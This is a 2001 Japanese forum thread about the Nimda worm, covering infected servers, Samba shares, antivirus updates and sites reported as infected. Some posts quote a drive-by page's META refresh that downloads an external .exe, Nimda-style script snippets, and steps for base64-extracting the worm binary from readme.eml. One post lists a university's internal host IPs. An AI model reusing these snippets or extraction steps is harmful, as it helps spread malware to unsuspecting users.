NGNGそれはIPマスカレードなどに関わることでしょうか?
丸見えかどうかはどうやって判断すれば…。
>>560
外部からは感染しそうもないのは大体わかります。
emlファイルがあったのは、ApacheではなくSambaで
共有していたディレクトリでした。
サーバ立ててるくせに厨房っぷりを発揮してすい
ません…。まだやり始めたばかりでこれからという
ときにこんなことになってしまったので。
0562
NGNG本当だ!!
バスター君、働いてくれた。
俺が見に行った時のアクセスカウンター 010325だけど・・・。
どれくらいまで増えるのかな?
0563558
NGNGCATVとかだったら有り得る…のかな?
ipchains なり iptables で、ポート番号137-139と445(TCP/UDP)あたりが
ブロックされていればOKでしょう。
0564名無しさん@お腹いっぱい。
NGNGそれテスト用のページみたい。
本編はこちら本編も感染。
ttp://www.bee.woodland.co.jp/
感染してるのに軽い。
0566名無しさん@お腹いっぱい。
NGNGこんな事聞くのもヤボだけど
どうやって感染の有無をチェックした?
W2kはFW通しているから安全とは思っていない?
W2kでこっそりIISが走っていない? インストールしたつもり無くても走ってる事あるよ。
CoderedUに感染した事ない?
このスレでリンクされてる感染サイト行ってない?
0567名無しさん@お腹いっぱい。
NGNGわざわざ記事にするような話だろうか。
0568名無しさん@お腹いっぱい。
NGNGSambaの方も対策打つべし
「Samba における Nimda ワーム対策」
http://www.samba.gr.jp/project/kb/J0/1/09.html
0569
NGNGようなの作らないと駄目だな。
0571名無しさん@お腹いっぱい。
NGNGクソなアタックかけてくるPCをシャットダウンさせることだ。
ネットワークテロもそれを放置するやつも区別しない。
0573名無しさん@お腹いっぱい。
NGNGちょんって頭悪いのかな?普通気付くだろ。
0574名無しさん@お腹いっぱい。
NGNG0575名無しさん@お腹いっぱい。
NGNG0576名無しさん@お腹いっぱい。
NGNGつか今更キャッシュのNimdaが検出されて騒いでるとかじゃない
ことを願う(w
0578名無しさん@お腹いっぱい。
NGNG875 :追加 :01/09/23 00:28
ニムダは感染する環境の人には何度でも感染してくれる所が特徴だ。
それはユーザーの利用意識による所が大きい。
さらに一部は人間の脳に感染し脳をスポンジ化する。
0579名無しさん@お腹いっぱい。
NGNGつーか、一ヶ月ぐらいシャットダウンされたのも気付かないかも(w
0580名無しさん@お腹いっぱい。
NGNGここまでの情報だと
1 SAMBAでファイル共有をしている。
2 WebサーバはApache
3 書いてないけど、サーバのOSはUNIX系
4 クライアント機はWindows98とMeが混在
5 クライアント機について、スキャンしたけどNIMDAの感染は発見できない
6 SAMBA共有ディレクトリ上に*.emlファイルが発見された
7 6のファイルを削除したが、また作られていた
ということかな
ほとんどクイズだけど、サーバ機にはWindowsNT/2000はないということ
でいいのかな?
サーバ機経由の再感染が考えられないのであれば、ファイル共有をして
いる範囲のクライアントのどれかが感染しているとしか考えられないね。
5のスキャン、検索をどのように実施したのかが問題のように思えるけど。
Samba上の*.emlファイルを削除して、次ぎに*.emlファイルが作られたら、
その間のSambaのログを追いかけるのも手だね。
噂では、Nimdaに感染したWinMe機から手動で関連ファイルを削除しても、
なぜか元に戻ってしまうケースもあるようだし。
0581名無しさん@お腹いっぱい。
NGNGんで、あんだコケてたわ、とかいって再起動しておしまい。
駆除?するわけないっしょ。バックドアがあるのがその証。
0582名無しさん@お腹いっぱい。
NGNGA1: SAMBA上の.emlは消したけど.nws,*.exe,riched20.dllは消してない
0583名無しさん@お腹いっぱい。
NGNGおかしいと思ったんだよなぁ。鯖Apacheで、おそらくOSもUNIX系なのにやけにニムダ供給鯖になってるとこが多いなぁと・・。
Winユーザがアプした、ってだけのカンジじゃないんだよな、数的に。
いや、単なる疑惑なんだけど。
0584名無しさん@お腹いっぱい。
NGNG0585名無しさん@お腹いっぱい。
NGNG一ヶ月たったら、ニムダの存在自体忘れてるね
0586名無しさん@お腹いっぱい。
NGNG実際作るだけ作ってもらって、いじると怒られる情けない管理者っていそう(^^;
0587名無しさん@お腹いっぱい。
NGNG0588名無しさん@お腹いっぱい。
NGNG>>583
感染ファイルの所有者を見ればわかると思われ。
クライアントからアップしたファイルならクライアントの
ユーザ所有になってるはず。
0589名無しさん@お腹いっぱい。
NGNGクライアントで作成した時にhtmlだけスクリプト埋め込まれているのもありそう。
readme.emlがアップされてないので404エラーとなる。
0590589
NGNG0591名無しさん@お腹いっぱい。
NGNGよく分かっていないのか、ご丁寧にreadme.emlまで、フォルダの中身丸ごとアップしたとおぼしきところもあるなぁ。
0592591
NGNG0593名無しさん@お腹いっぱい。
NGNGつーか、ファイル共有でマウントしていれば、自動的に書き込まれるけど。
0594名無しさん@お腹いっぱい。
NGNG0595名無しさん@お腹いっぱい。
NGNG0596名無しさん@お腹いっぱい。
NGNGMozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
これでSP2かどうかは判るの?
0597名無しさん@お腹いっぱい。
NGNGなんだが、前スレでApacheでは平気だとかUNIX系は影響ないだとか、ウルサイのがいてねえ。
0598名無しさん@お腹いっぱい。
NGNGパワーステージさんはバックドアのこともメールしておいたので
大丈夫っぽいね。
0599名無しさん@お腹いっぱい。
NGNG平気っつーか感染したファイルを転送や共有をしない限り
問題はない。
readme.emlやreadme.exeがUnix内でhtmlに感染して増殖する
とでも?
影響あるってのはそういう意味でしか見てないけど。
0600名無しさん@お腹いっぱい。
NGNGhttp://www1.sphere.ne.jp/noone/
ここのサイトとても役に立ったよ。
他の板で”IP抜くぞー”って息巻いてた粘着君に、
”自信有るならここの掲示板にバーカって書き込みして来てよ。”
て言ったらそれ以来、煽りがやんだ。
見た目ちょっと気持ち悪いもんね。
0601名無しさん@お腹いっぱい。
NGNGわはは。 使わせてもらうよ。
0602名無しさん@お腹いっぱい。
NGNG連休明けの影響だろうけど、昨日一日で日本だけ2倍近く増えてません?
0603名無しさん@お腹いっぱい。
NGNGどこか目立つ場所で啓蒙活動しないとだめかねえ?
0604名無しさん@お腹いっぱい。
NGNG先週の時点で(普通の企業や人間は)大なり小なり対策を打っているんで、残っているのはDQNの連中だろうね!
そこぞのISPのようにNimdaおよびCodeRedに感染したホストを切断して欲しいもんだ(w
http://www.hotwired.co.jp/news/news/business/story/20010925104.html
0605名無しさん@お腹いっぱい。
NGNG「感染したのはお前の所経由なんで責任取れ!」(確かに事実かもしれん)
「MSが悪い!俺は悪くない!だからサービスを使えるようにしろ!」
「他にも感染して使ってる奴がいるだろう! それを全部止めたら俺のも止めていいぞ!」
「で、どうすれば良いんだ! こっちに来てから教えろ!」
:
:
:
0606>603
NGNGまあ許そう。
しかし、今日になってもまだ汚染されたまま
パケット垂れ流してきてる輩は、何とかしてくれ。。。
advaoptical.co.jp
whoisで調べた技術担当者にもメールしたがまだそのまま。。。
0607・・・
NGNG技術担当者・・・・・うちの会社の場合、既にそんな奴いないぞ!(w
0608名無しさん@お腹いっぱい。
NGNG。。。。期限切れな気がする。。。
vote落としてきたけど、バスターのパターン942じゃ検出しない。。。
あそこはガセつかます場所じゃないし。
・・・何もこんな時期に期限切れ来る事無いだろう(TT)
0609料理場
NGNGこれなら大丈夫なんですか?
0610名無しさん@お腹いっぱい。
NGNG受信・着信メールがすべて不特定多数に転送されています。
0611名無しさん@お腹いっぱい。
NGNG新聞はもうVOTEだとかさわいでるしな。まだニムダもおさまってないのに。
だれも発病してない狂牛病なんかよりでかく扱って欲しいよ>啓蒙
0612名無しさん@お腹いっぱい。
NGNGBecky!がIEのコンポーネント共有してなきゃ大丈夫?
・・Becky! ユーザーに譲る。
magistrの新種だっけ?メーラー、マルチで使えるの。
0613名無しさん@お腹いっぱい。
NGNG〜なら大丈夫なんですか?
っていう質問が多いけど、このテに大丈夫ってないんだよ。
引用:
875 :追加 :01/09/23 00:28
ニムダは感染する環境の人には何度でも感染してくれる所が特徴だ。
それはユーザーの利用意識による所が大きい。
さらに一部は人間の脳に感染し脳をスポンジ化する。
0614名無しさん@お腹いっぱい。
NGNGほんとだ、倍やん!(@@〜☆
0615名無しさん@お腹いっぱい。
NGNG別に、破壊ルーチン組んであるわけじゃ無いし、、、
サーバ管理者さんに頑張ってもらって、、、(以下略)
0616名無しさん@お腹いっぱい。
NGNGhttp://www.takara-univ.ac.jp/
0617名無しさん@お腹いっぱい。
NGNG9/25更新のパターン945はダウンロードみたいよ。
トレンドマイクロのページみてみな。
0618名無しさん@お腹いっぱい。
NGNGhttp://www.hyundaijapan.co.jp/
このまま会社ごと日本撤退?(w
0619名無しさん@お腹いっぱい。
NGNGなんかよくわからないけど、ボタン一発アップデートできないときがありますね。
#押しても反応がない
>>617 のいうように、昨夜もダウンロードでやればできたので、たぶん大丈夫。
0620名無しさん@お腹いっぱい。
NGNGきょうも不正パケット吐きまくったりしてるのかなぁ・・。
0622617
NGNGごめんごめん。www.trendmicro.co.jpから行くとなんでだか
わかんないよね。
バスター本体メニューのウィルス情報から行くページだが
ここ見るとわかるだろう。
http://vbc.trendmicro.co.jp/vbc/support/index_support.asp
0623608
NGNGサンクス。
というか、オンラインで更新しようとする時ウォールのログみてると
リダイレクトさせた後止まるの。言い方不味かった。ごめん。
vbuster-p1k.activeupdate.trendmicro.co.jpから
a1250.g.akamai.netに逝った後。
・・・・http使って転送掛けてるから今時色々弊害有るんかな。
サイトの情報、サンクス。
0624名無しさん@お腹いっぱい。
NGNG啓蒙してもムダだそうだ・・。
http://japan.cnet.com/News/2001/Item/010906-2.html?rn
0625名無しさん@お腹いっぱい。
NGNG絶対、PL法違反だよ。分かってるバグを残して出荷してるんだから。
マイクロソフトはXPを無償で配るべき!!
0626名無しさん@お腹いっぱい。
NGNGXPは重そうでいやだす。
0627名無しさん@お腹いっぱい。
NGNGまあ、全員にSPのCDを毎回送る、あたりが妥当でしょうな。
ワレのヒトには届かないよ(ワ
0628名無しさん@お腹いっぱい。
NGNG金取るなら、安全かつ軽くして欲しい。
0629名無しさん@明日があるさ
NGNG昼間は大丈夫なんだけど夜になると2ちゃんに書き込めなくなる
んだよね。
「不正proxy使用ですか?・・」 って決まって出るの。
串はずしても変わらないし。。。
何でだろ・・?
0630名無しさん@お腹いっぱい。
NGNG今回も修正が先に出てるわけで。(それ見てういるす作ってるんだろうし(w
「問題点が解消されてな」い、にはあたらないんじゃなかろうかと。
0631名無しさん@お腹いっぱい。
NGNG0632名無しさん@お腹いっぱい。
NGNGどこにぶら下がってる鯖か知らないけど、このへんか?(勝手な推測
http://www.hotwired.co.jp/news/news/business/story/20010925104.html
同じセグメント内に感染者いたり(w
0633629
NGNGさせてるから今のところ感染はしていないと思うんだが・・・
readme.emiはドコ検索しても見つからないし・・・
0634名無しさん@お腹いっぱい。
NGNG>XPでも問題点が解消されてなければ
:
>マイクロソフトはXPを無償で配るべき!!
問題解消してないならいらん。
0635名無しさん@お腹いっぱい。
NGNG>絶対、PL法違反だよ。分かってるバグを残して出荷してるんだから。
あらかじめ告知されてる不具合は製造者責任にあたらん。
0636名無しさん@お腹いっぱい。
NGNG金取るほうが低機能だったり>軽い(w
0637
NGNG単に串制限してるだけじゃないの?
生IPなら書き込めるっしょ
0638名無しさん@お腹いっぱい。
NGNGで、CodeRedってたしか進入できたIPはリストにしてそこを集中攻撃したり、そのリストを配布したりするんだよねぇ?
すると今回完全に駆除しても、IISにSP当ててなかったりすると早晩再感染するということ?
仮にバックドア削除してもほかよりもらう確率高いような・・。
バックドアがあるとかCodeRedにかかったような痕跡持ってるところがニムダにかかってる例が多いからそう思っただけなんだけど。
0639629
NGNG0640↓だってさ
NGNGひろゆき
もうだいぶばれてきたようなので白状します。
『不正PROXY使用ですか、、、?
じゃなければ、公開されてるPROXYを使用されてるかも。。。
プロバイダかシステム管理者さんと相談してね。(プロキシーを外部から使えないようにしてくださ
い、、、とか、、、)』
というように表示してますがこれは事実と異なります。
すまんです。本当はこのように表示すべきでした。
「PROXY規制中! .jp以外を規制してます。」
でもこのように表示するとものすごい非難メールが押し寄せる恐れが
あるためできませんでした。
規制に怒った変質者に逆恨みのテロでも起こされたらいやずら。
(省略されました・・全てを読むにはここを押してください)
0641名無しさん@お腹いっぱい。
NGNG>CodeRedにかかったような痕跡持ってるところがニムダにかかってる例が多い
というか、それ狙ってくる。CodeBlueの亜種みたいなもんでしょ。Nimda
・・・んだけど、「redの対策だけパッチ」当ててもredと違う穴突いてくるか
ら再感染。。恐るべし、Concept Virus(CV) V.5
0642>>638
NGNGああ、やっぱりねぇ。そういうところって、閉鎖になって駆除されたように見えても、すぐ再発してるもんね・・・。
勉強になりました。どうもありがと。
0643名無しさん@お腹いっぱい。
NGNG> というか、それ狙ってくる。
あ、それってこれと関係あります?
158 名前:ん〜ま 投稿日:01/09/20 23:31
linuxなのだが試しに、ダミーのroot.exeとか置いたらアクセスが増えてしまったw
0644641
NGNG確か、root.exeに対し"HED〜で来るのがブルーで、"GET〜で来るのがNimdaだって誰か言ってた。
逆かも、、忘れた。
んで、有るの確認すると更に次の行動起すよ。同じ所から何発か連続で来ると思うけど。
0645まっか
NGNGすげぇ鬱だった。
0647>>643
NGNGなるほどねぇ。
よくわかった。ありがとう。
単発のDOSプロンプトで動く駆除ツールって、ニムダが作るファイルしか見てないでしょう?
なんか駆除されてもしっかりroot.exe残ってたりして。
0648>
NGNGadvaも載ってるんだが、早く気づけよ。
0649名無しさん@お腹いっぱい。
NGNG>●Windows NT 4.0/2000/XP は影響を受けない(ウイルス・ファイルを勝
> 手に実行しないそうです)
って本当ですか?そんなことないですよね(汗
今社内でメールまわってきたのですが。
うちの会社鯖にIIS使ってないせいか、のんきで…
0650名無しさん@お腹いっぱい。
NGNG>(ウイルス・ファイルを勝手に実行しないそうです)
全部の端末/鯖にパッチ当てたの確認済みなんだよ。優秀な管理者居るね。
・・・そう思っておいた方がシアワセよ。
更に不景気になりそうだし。テロ関係のお陰で。
早まるのは止めなさい。。
0652名無しさん@お腹いっぱい。
NGNGニムダ特需でソフトやPCが売れているみたいだぞ。
昨日も重そうにヨドバシの梱包されたIBMの鯖の段ボールを重そうに持ってるオヤヂを複数みたぞ。
0653名無しさん@お腹いっぱい。
NGNGこの不況下で転職など不可能ですので、早まりません(w
>651
…ですよねえ(号泣)
今から管理者に伝えてきます…
0654名無しさん@お腹いっぱい。
NGNG> うちの会社鯖にIIS使ってないせいか、のんきで…
ニムダじゃないけど、W2kで、眠っていたIISを外側から起動させられたケースってなかったけ?(^^;
0655649
NGNGそういう意味かい!!(w
0656名無しさん@お腹いっぱい。
NGNGなんでもいいけどここ、明らかにこのスレと前スレチェックしてるね(^^;
0657650
NGNGまぢで!!
これでそのオヤヂ達、ネットに繋いだら大喜びするんだろうね。
コレでクリーンな鯖で仕事できるって。
・・・IIS立てるとすれば、、同梱OSのSP、バージョン高ければ良いけど。。
そうか、感染しても大喜びなのか。ウイルスはぢめて見た!って。
0658名無しさん@お腹いっぱい。
NGNG新宿ヨドバシの書籍コーナーで赤帽LinuxのCD付きの本を手に取っているおねいさんを見たが、どこまでホンキなのか・・。
0659657
NGNGナムパすれば良かったのに・・・
対応ドライバの一覧表持って。。。。
ビデオボード、何使ってるの?LANカードは?って。
!!漏れ、早速プリントアウトして張り付いてる!
書籍コーナーに!!
ワクワク!
0660名無しさん@お腹いっぱい。
NGNGいつもよりLinuxコーナーにヒトが多いのはナムパ目当てか?!(^^;
0663名無しさん@お腹いっぱい。
NGNG飢えた狼の群れに子羊を投げ込むような
0664名無しさん@お腹いっぱい。
NGNG十分、ありえるだろうね・・・
説明書にはケーブル接続した後にセットアップをはじめてくださいって書いてるから!
実際にそれで、3回入れなおして初めて気づいた厨房知ってるし(w
0666先行者キャノン ◆9CZFSYK.
NGNGひろゆき
もうだいぶばれてきたようなので白状します。
『不正PROXY使用ですか、、、?
じゃなければ、公開されてるPROXYを使用されてるかも。。。
プロバイダかシステム管理者さんと相談してね。(プロキシーを外部から使えないようにしてくださ
い、、、とか、、、)』
というように表示してますがこれは事実と異なります。
すまんです。本当はこのように表示すべきでした。
「PROXY規制中! .jp以外を規制してます。」
でもこのように表示するとものすごい非難メールが押し寄せる恐れが
あるためできませんでした。
規制に怒った変質者に逆恨みのテロでも起こされたらいやずら。
(省略されました・・全てを読むにはここを押してください)
0667名無しさん@お腹いっぱい。
NGNG>ヤパーリ、パッチは当てとかないとね。
そのパッチをネットからダウンロードしよう、なんて腹づもりだったり・・・。
0668名無しさん@お腹いっぱい。
NGNGところがフロントページのインストールされたW2kがバックドア全開で感染していて
ウプしたページがNimuda配布サイトとなってしまうというオチもある。
0669&
NGNGreadme.eml をダウンロードさせるスクリプトが残っているが
エラー404になる。
これで対策されていると言うべきか?否か?
どっち。
0670名無しさん@お腹いっぱい。
NGNG葛西社長発表、FWで対処した。これでバッチリにゃ。
0671名無しさん@お腹いっぱい。
NGNGそっち有るのね。>フロントページ。
・・・そう言えばフロントページ自体、別バグ無かったっけ??
忘れた。。気のせいか。
0672名無しさん@お腹いっぱい。
NGNGhttp://211.11.222.51/
0673名無しさん@お腹いっぱい。
NGNGreadme.eml が削除されただけね(^^;
手で削除?
0674名無しさん@お腹いっぱい。
NGNGそれOCN側回線のダミーページだよ。
http://61.202.212.148/
本体はこちら。疑惑の61だ。内部がまったり感染してそうね。
0675>673
NGNG>手で削除?
それって セキュ穴とかバックドアとかそのままってことか?
0676名無しさん@お腹いっぱい。
NGNG#前略
<SCRIPT language=JavaScript>開いちゃうぞ〜("おいしいねニムダ", null, "resizable=no,top=6000,left=6000")</SCRIPT>
・・・頂きました。。ウマカタです。。
0677名無しさん@お腹いっぱい。
NGNG単発ニムダ用の駆除ツールでは、root.exeおとがめなし、なやつもあるみたい。
html内の問題コード削除しないのとか。
0678名無しさん@お腹いっぱい。
NGNGあれえ?
こっちは感染していて、
>ttp://211.11.222.51/
> それOCN側回線のダミーページだよ。
こっちは感染していないような。
> http://61.202.212.148/
> 本体はこちら。疑惑の61だ。内部がまったり感染してそうね。
そんなことってある?
0679名無しさん@お腹いっぱい。
NGNGマジで毎晩シャットダウン?(^^;
http://www.takara-univ.ac.jp/
0680名無しさん@お腹いっぱい。
NGNGニムダ対策?夜閉めるって、何か効果あるんだろうか・・。
0681名無しさん@お腹いっぱい。
NGNG先程JavaをONのまま、ニムダに感染したHPを踏んでしまいました。
そしたらTemporary Internet Filesフォルダにreadme.emlが出現。
私のPCは感染したんですか?それとも、ダウンロードしただけで
まだ実行されてないんですか?いまいちよくわかりません。
すみませんが、教えてください。
0682名無しさん@お腹いっぱい。
NGNG昼間はニムダを超える高速処理の達人が手動で削除していると思われ(薬
0683名無しさん@お腹いっぱい。
NGNG?マーク付いてる後者に1票。
ブラウザキャッシュ消しなさい。
0684名無しさん@お腹いっぱい。
NGNGWINDOWSってロゴの下に、「By Nimda」って出るんだけど、
新種?
0685681
NGNGありがとうございます。キャッシュ消してみました。
これから、ウイルススキャンしてみようと思います。
0686名無しさん@お腹いっぱい。
NGNGまじですか?
0687684
NGNGマジダヨ。
新種かな?
ノートンのアンチウィルスでスキャンしても、
何も出ないんだよね。
変なソフトでも実行しちゃったかな?
0688名無しさん@お腹いっぱい。
NGNG『*.eml』『*.nws』『readme.exe』『load.exe』あたりを
検索してみそ。
System.iniは「Shell= explorer.exe load.exe -dontrunold」
とかなっていないか?
0689バイキソ君
NGNGフーん。。。
その辺いぢるウイルスって聞いたこと無いなーーー。
確かに新種かもねん。
技術的には可能だろうね。起動画面のネタ元、ローカルで
上書きするだけだし。
0690684
NGNGやってみたけど無い。
iniファイルも見てみたけど、Shell= explorer.exe
ってなってた。
しかし、この現象は何だろう?覚えが無いんだけど。
0691バイキソ君
NGNG0692名無しさん@お腹いっぱい。
NGNG自分宛にメール送ってみるとかしてみる?
0694対策済
NGNG開いただけでダウンロードするか聞いてくる。
http://user.memberz.to/active/001/main.html
0695名無しさん@お腹いっぱい。
NGNGlolita.exeを落させようとするものだと思われ。
いやはや、思わぬ弊害かな。>アダルトサイト運営者。
0696防衛体制万全くん
NGNG試しにアクセスしてみた。
推測だが、Q2アクセスソフト、または、
ダイヤルアップ書き替えソフトと思われる。
0697対策済
NGNG<!--
newWin =
window.open("java.html","","width=500,height=200");
// --
</SCRI-->
<META HTTP-EQUIV="Refresh" CONTENT="15;URL=http://www.mars.sphere.ne.jp/yanoo/DTI/lolita.exe">
</HEAD>
0698名無しさん@お腹いっぱい。
NGNGというか、アダルト巡りはjava切りなさいって(w
敢えて虎穴に入りたいならかまわんが。。。
0699対策済
NGNGリロードの代わりにダウンロードか・・・・・?
0700名無しさん@お腹いっぱい。
NGNGリロードしても、結局対象exeだから、ダウンロードする羽目ね。
0701名無しさん@お腹いっぱい。
NGNG0702名無しさん@お腹いっぱい。
NGNGあ?てことはQ2業者の中には、今回ニムダが突いたバグを知っていて、未対策ブラウザならだまって設定させていたものがあった・・?
0703名無しさん@お腹いっぱい。
NGNGしまった。先にそれに気がついていれば。
0704名無しさん@お腹いっぱい。
NGNG可能性有りかも。
あれ利用するのそんなに難しくないし。。。
javaのopenコマンド自体は不正でも何でも無いが、
emlファイルの作り方ね。。
0705名無しさん@お腹いっぱい。
NGNG0706684
NGNGやっぱりなって感じ。
0707名無しさん@お腹いっぱい。
NGNG*** readme.exe のソースコード ***
どこかに落ちてなぁい?
0708名無しさん@お腹いっぱい。
NGNG作ったやつしか持ってないだろ。
0709SAGE
NGNG感染サイトから.eml落してデスアセ取ってた人は初期の頃居たよ。。
このスレパート1から2辺り。
その頃、guestアカウント追加する活動疑問視されてたけど、ソースか
らはレジストリ弄る命令読み取れた。
0710名無しさん@お腹いっぱい。
NGNGはやくういるす駆除ソフトメーカーに報告してくれ(´Д`)
0711名無しさん@お腹いっぱい。
NGNGこういうのけ?
http://211.11.222.51/
0712707
NGNG全てリンク切れ。
どこかにUPしてけれぇ。
0713名無しさん@お腹いっぱい。
NGNGありがとう。タノム。
0714のうわん
NGNG>>158
>>243
>>266
>>267
>>274
>>276
>>285
>>290
>>329
>>331
>>600
>>601
http://www1.sphere.ne.jp/noone/
有名サイトだったのに。
0715名無しさん@お腹いっぱい。
NGNG<html><script language="JavaScript">billgates.open("ほげほげ.eml", null, "resizable=n
o,top=6000,left=6000")</script></html>
とかカキコすると、そこ削除されるね(^^;
0716名無しさん@お腹いっぱい。
NGNG厨房達には願っても無い情報だ。
検索サイトも感染サイトが引っかからなくなったよ。
スクリプトコードの記述ぐらいは問題無いと思うんだけどなー。
・・・ううう、
一応、リスク犯して作業したの俺じゃ無い。。だからそのままUPするの
は気が引ける。。その彼が個人スペースで公開してたのは確か。
逆アセソースというより、binのダンプデータだった。。。
俺、リンク先残ってるかと思ってROMったの探したけど、丁度PART1から
2に移行する辺りのレス保存できてなかった。。。多分そこでリンク先貼
って有ったと思われ。履歴にも残ってなかった。。
・・やり方としては、readme.eml落して、txtに拡張子変換。base64エ
ンコードしてある添付部分をtxtコピペで切り出しデコード。
readme.exeなんかの名前で保存。
後は、バイナリエディターなりでダンプ取る。拡張子txtにしとく方が無難。
・・・但し、アンチウイルスの常駐切らないとこの作業できない。検出駆除
されちゃう。
ダンプ取ってる最中も自爆しかねない。←コレ一番危険。
本体の拡張子弄るときも、要注意。
・・・ごめんよ。力になれなくて。。。
base64エンコード/デコーダーはフリーで幾つかある。
MIMEBase64ってのでやった。俺は、テキストで覗いただけ。
binエディタもフリーの奴、いっぱい有る。
0718名無しさん@お腹いっぱい。
NGNGキャッシュ、、、検出、、、クレーム、、
あまり言いたく無いよ。
流石にreadme.eml改変バージョン、自分サイトで悪意の目的に使う奴は
居ないと思うけど。
・・・これからパソコン買い換えたり新規で買う初心者ユーザー居るわ
けだし。。。潜在的な危険性は否定できない。。。
パッチはアンチウイルスよりも重要。
0719名無しさん@お腹いっぱい。
NGNGそれをメールに貼り付けて送信しウィルスバスターPOP3マシンで受信するとウィルス発見ってなるよ。
既出?
0720名無しさん@お腹いっぱい。
NGNG一応外出。
ノートンだとどうも検出しないのね。
メール本文にコピペでいけるよ。>バスター
書き込みtxt添付した場合はどうなのかな。
まぁ、只のいたづらレベルだから、、別に良いけど。
アンチウイルスの動作確認には、安全お手軽でいい方法かな。。
スパム爆弾はいやづら。。
0721
NGNG0722>>618
NGNG実はここ、昼ごろ復活してました。
http://www.hyundaijapan.co.jp/
でもまだNT鯖のままでした。
つまり(w
0723名無しさん@お腹いっぱい。
NGNGどこぞのフォーマット厨房を信じて
HDフォーマットして全入れ替えしてるんじゃない?(藁
0724名無しさん@お腹いっぱい。
NGNG心配しなくても大丈夫だよ。
きっと次のネタの仕込みしてるんだろう。
0725名無しさん@お腹いっぱい。
NGNGいまとなっては懐かしいねえ>フォーマット厨(w
あぱっ厨・りなっ厨もいましたな。
今日の昼見た限り、少なくともここは改宗したみたいだったのですが・・。
http://www.takara-univ.ac.jp
0727名無しさん@お腹いっぱい。
NGNGコマンドメール投げると、VOTEを送り返してくれるサイトはどこかにないか?(w
0728名無しさん@お腹いっぱい。
NGNGフォーマットでもしないと安心できないと思うがどうよ?
0729名無しさん@お腹いっぱい。
NGNG感染・駆除めんどくなって閉鎖、そのまま放置ってのが増えそうな予感・・。
個人・企業問わず。
なんらかのサービス(情報提供)やネット通販でもやってない限り、大半は会社案内webなんかで大した役にはたってなかったろうけど。
0730名無しさん@お腹いっぱい。
NGNGVOTEは英語がサパーリ判らないと意味なし。
よって日本ではただのジャンクメール扱いとなる。
日本語そのものがウィルス対策となっている(ワ
0731名無しさん@お腹いっぱい。
NGNGフォーマットしても、パッチなんて思いもよらず再感染していると見てるがどうよ?
0732名無しさん@お腹いっぱい。
NGNGそうそう。だからアメリカのMLにでも入らないと入手できないわけよ(w
0733名無しさん@お腹いっぱい。
NGNG723は粘着アンチフォーマット君に決定。
同じ議論の繰り返し。
何の進展もない。
もうやめようぜ。
0734名無しさん@お腹いっぱい。
NGNG感染
フォーマット
バックアップ復元
なにもかも感染直前に復元
再感染
これの繰り返しと思われ。
0736名無しさん@お腹いっぱい。
NGNG0737名無しさん@お腹いっぱい。
NGNG鯖立てている場合の感染はCodered対策がまず先って教えてやれよー。
0738名無しさん@お腹いっぱい。
NGNG0739名無しさん@お腹いっぱい。
NGNGあ( ̄△ ̄; そういえばそのテにはどこにも書いてないね。
ニムダ用駆除ツールもバックドアおとがめなしだし。
0740名無しさん@お腹いっぱい。
NGNG鯖をLinuxにしたと思われ(w
0741MSNの話題が出てきたのでちと調べてみた
NGNGDate: Wed, 26 Sep 2001 16:07:37 GMT
Server: Microsoft-IIS/5.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Content-Length: 78215
Content-Type: text/html
P3Pって・・・・もうこんなモノ吐いてるのか!?
0742(==)
NGNG→ とりあえず、windows updateに一発目に行って、IE5.01sp2
か5.5SP2を当てる→ ネットを切ってメル設定→ メルの送受信はしないで
安置ウイルスいんすと→ ネット繋いで安置を最新版にあっぷ
理解力が低いやつは、これで完璧っつっといたらええべ??
漏れはこんなめんど〜ナ事はする気ないが(w
0743名無しさん@お腹いっぱい。
NGNGプリインストールされてるメーカー製パソコンをデフォルトで使っているユーザーには
それでも専門用語が多いし手順も多すぎる・・・ハァ。
メーカーが対策済みのリカバリCD−ROMでも出さないといけないのかなハァハァ。
0744名無しさん@お腹いっぱい。
NGNG>メルの送受信はしないで 安置ウイルスいんすと→ ネット繋いで安置を最新版にあっぷ
と、いいたいところだけど、ういるすばすたなどはメルでキーをもらわないと、最新版にアプできないよん。
0745名無しさん@お腹いっぱい。
NGNGその点だけど、トレンドマイクロの場合は現在インターネット上で
最新の検索エンジンとパターンファイルを臨時(?)で配布している模様。
多分、ノートンも同様の措置をとっているかと思われ。
0746名無しさん@お腹いっぱい。
NGNGこのレベルなのに、中小企業などで強制的に鯖建立やらされて、やっとの思いで外から見えるようにした時点でちからつきているのに、システム管理者の烙印(wまで押されちゃったやつにはどうしてやったらよかんべ。
0747名無しさん@お腹いっぱい。
NGNG今朝見たら、
宝塚造形芸術大学
http://www.takara-univ.ac.jp/
また見える。
夜は寝て、昼は起きる鯖になったもよう(^^;
そしてここに飛ばされる。
http://exchange.takara-univ.ac.jp/
しかしこのURLは一体なんだ?(^^;
0748名無しさん@お腹いっぱい。
NGNGヒュンダイきょうも閉まってら。
http://www.hyundaijapan.co.jp/
やはり昨日復旧→即再感染→ウマー(´Д`) となったと思われ。
0749名無しさん@お腹いっぱい。
NGNGまないのにワラタ
0751検索くん1号
NGNGIPアドレス: 202.223.228.1
ホスト名: ns.takara-univ.ad.jp
IPアドレス: 202.223.228.2
ホスト名: FireWall-1.takara-univ.ac.jp
IPアドレス: 202.223.228.3
ホスト名: www.takara-univ.ac.jp
IPアドレス: 202.223.228.4
ホスト名: mail.takara-univ.ac.jp
IPアドレス: 202.223.228.5
ホスト名: Exchange.takara-univ.ac.jp
IPアドレス: 202.223.228.9
ホスト名: artinfo.takara-univ.ac.jp
IPアドレス: 202.223.228.20
0752名無しさん@お腹いっぱい。
NGNGどうやら高くついたようだな>宝塚造形芸術大学 短期大学部
0753名無しさん@お腹いっぱい。
NGNGWeb View Browser
http://www.mcafee.com/myapps/utilities/ov_neoplanet.asp
これならニムダにも感染しないぞ、ってか?
0754名無しさん@お腹いっぱい。
NGNG当大学ではコンピューターを使ったアーティストの自由な自己表現の1つとして作品名ニムダを展示しております。
決して何も解っていないコンピューターオタ達の言うワームの感染ではありません。
と開き直れ。
0755名無しさん@お腹いっぱい。
NGNG感染後にあわてて業者に対策させたのだろうが、
Exchange.takara-univ.ac.jp
このへんですでにダマされてると思われ・・。
0756名無しさん@お腹いっぱい。
NGNGそうだ、表紙にニムダ配布の事実を伝えろと抗議すべきだ
0757名無しさん@お腹いっぱい。
NGNGうちのCATV屋もやってくれ・・。
0758名無しさん@お腹いっぱい。
NGNGあれえ?
ρ(^-^)ここにいくと
202.223.228.4
